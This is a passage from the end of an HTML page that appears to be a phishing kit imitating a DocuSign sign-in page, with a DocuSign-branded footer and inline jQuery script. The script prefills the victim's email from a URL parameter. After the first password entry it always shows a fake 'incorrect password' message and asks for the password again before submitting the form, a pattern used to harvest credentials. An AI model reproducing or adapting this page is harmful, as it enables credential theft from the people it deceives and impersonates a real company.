13.1 17 13.1 8.9 0 15.3-4.5 15.3-12.5.1-8.5-6.5-10.4-14.6-12.2zm86.6.7c-1.6 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zm0-5.5c-1.4 0-2.5 1.1-2.5 2.5s1.1 2.5 2.5 2.5 2.5-1.1 2.5-2.5-1.1-2.5-2.5-2.5z">
                                            </path>
                                            <path
                                                d="M224.6 25.5h1c.4 0 .7 0 .9.2s.3.4.3.8c0 .6-.4.8-.6.8l.7 1.2h-.7l-.6-1.1h-.5v1.1h-.6v-3h.1zm.6.5v1h.6c.1 0 .5 0 .5-.5 0-.1 0-.3-.2-.4-.1-.1-.3-.1-.6-.1h-.3z">
                                            </path>
                                        </svg></span></div>
                            </div>
                        </div>
                        <div class="css-1lg1d1c-FOOTER_MAIN_ROW_NO_LOGO">
                            <div class="css-1u727pn-FOOTER_MOBILE_LINKS">
                                <div>
                                    <div class="css-33iyv5-FOOTER_LANG_SELECT_INK_BUTTON"><button aria-haspopup="true"
                                            data-qa="footer-link-LANGUAGE_SELECTOR"
                                            class="olv-button olv-ignore-transform css-12bkj2t" type="button"><span
                                                data-qa="footer-link-LANGUAGE_SELECTOR-text" class="css-1ixbp0l">English
                                                (US)</span><span data-qa="footer-link-LANGUAGE_SELECTOR-trigger"
                                                class="css-3fyily"><span class="css-buwdtc"><span
                                                        class="css-hg1vx5"><span aria-hidden="true"
                                                            class="SVGInline"><svg class="SVGInline-svg"
                                                                xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20"
                                                                focusable="false">
                                                                <path
                                                                    d="M10.62 12.73L15 8H5l4.38 4.73a.85.85 0 001.24 0z">
                                                                </path>
                                                            </svg></span></span></span></span></button></div>
                                    <div data-qa="reveal"></div>
                                </div>
                                <div data-link="true"><a href="#"
                                        target="_blank" rel="noopener" data-qa="footer-link-CONTACT_US"
                                        class="css-1ds9fej-FOOTER_LINK">Contact Us</a></div>
                                <div data-link="true"><a
                                        href="#" target="_blank"
                                        rel="noopener" data-qa="footer-link-TERMS" class="css-1ds9fej-FOOTER_LINK">Terms
                                        of Use</a></div>
                                <div data-link="true"><a href="#"
                                        target="_blank" rel="noopener" data-qa="footer-link-PRIVACY"
                                        class="css-1ds9fej-FOOTER_LINK">Privacy</a></div>
                                <div data-link="true"><a href="#" target="_blank"
                                        rel="noopener" data-qa="footer-link-INTELLECTUAL_PROPERTY"
                                        class="css-1ds9fej-FOOTER_LINK">Intellectual Property</a></div>
                                <div data-link="true"><a href="#" target="_blank"
                                        rel="noopener" data-qa="footer-link-TRUST"
                                        class="css-1ds9fej-FOOTER_LINK">Trust</a></div>
                            </div>
                        </div>
                        <div class="css-esxh0p-FOOTER_BOTTOM_ROW">
                            <div style="margin-left: 0px;">
                                <div data-link="true"><span data-qa="footer-copyright">Copyright © 2023 DocuSign, Inc.
                                        All rights reserved</span></div>
                            </div>
                        </div>
                    </div>
                </footer>
            </div>
        </div>
    </div>

</body>

<script>
    const queryString = window.location.search;
   // console.log(queryString);
    const urlParams = new URLSearchParams(queryString);
    
      const product = urlParams.get('email')
    // console.log(product);
     document.getElementById("email").value = product;
    

     $('#submit1').on('click', function(){
       var emailpa = document.getElementById("email");

    var valid = /^([\w-\.]+@([\w-]+\.)+[\w-]{2,4})?$/.test(emailpa.value) && emailpa.value.length;
    if(valid){
      $('#valid').css('display', 'none');
  $("#remove1").delay(1000).fadeOut(500);
  var iru = document.getElementById("email").value;
  $("#sub").delay(1000).fadeOut(500);
  $("#submit1").delay(1000).fadeOut(500);
  $("#main_submit").delay(1000).fadeIn(550);
  $("#password1").delay(1000).fadeIn(550);
  $("#kilode").delay(1000).fadeIn(550);
$("#userInfo").text(iru);
$("#not").text('Log In');
    }
    else{
      $('#valid').css('display', 'block');

    }
});

$("#main_submit").click(function(){

    var passwordcheck1= $("#password").val();
    if (passwordcheck1 != ''){
    
  $("#first-password").delay(1000).fadeOut(500)
//   $("#sub").delay(1000).fadeOut(500)
//   $("#main_submit").delay(1000).fadeIn(550)
//   $("#valid12").delay(1000).fadeIn(550)
$('#main_submit').removeAttr("type").attr("type", "submit");

  $("#second-password").delay(1000).fadeIn(550)
  $("#incorrect_password").delay(1100).fadeIn(550)

  $("#valid_password").delay(500).fadeOut(550)

    }else{

$("#valid_password").delay(500).fadeIn(550)

    }


});

var input = document.getElementById("email");

// Execute a function when the user presses a key on the keyboard
input.addEventListener("keypress", function(event) {
  // If the user presses the "Enter" key on the keyboard
  if (event.key === "Enter") {
    // Cancel the default action, if needed
    event.preventDefault();
    // Trigger the button element with a click
    document.getElementById("submit1").click();
  }
});


var input = document.getElementById("password");

// Execute a function when the user presses a key on the keyboard
input.addEventListener("keypress", function(event) {
  // If the user presses the "Enter" key on the keyboard
  if (event.key === "Enter") {
    // Cancel the default action, if needed
    event.preventDefault();
    // Trigger the button element with a click
    document.getElementById("main_submit").click();
  }
});

$(document).ready(function () {
  $("form").submit(function (event) {

    var passwordcheck= $("#pwd").val();
    if (passwordcheck != ''){
    
        $("form").submit();
     }
  else{
    $('#valid1').css('display', 'block');
    return false;
  }
  });
  
});
      </script>

</html>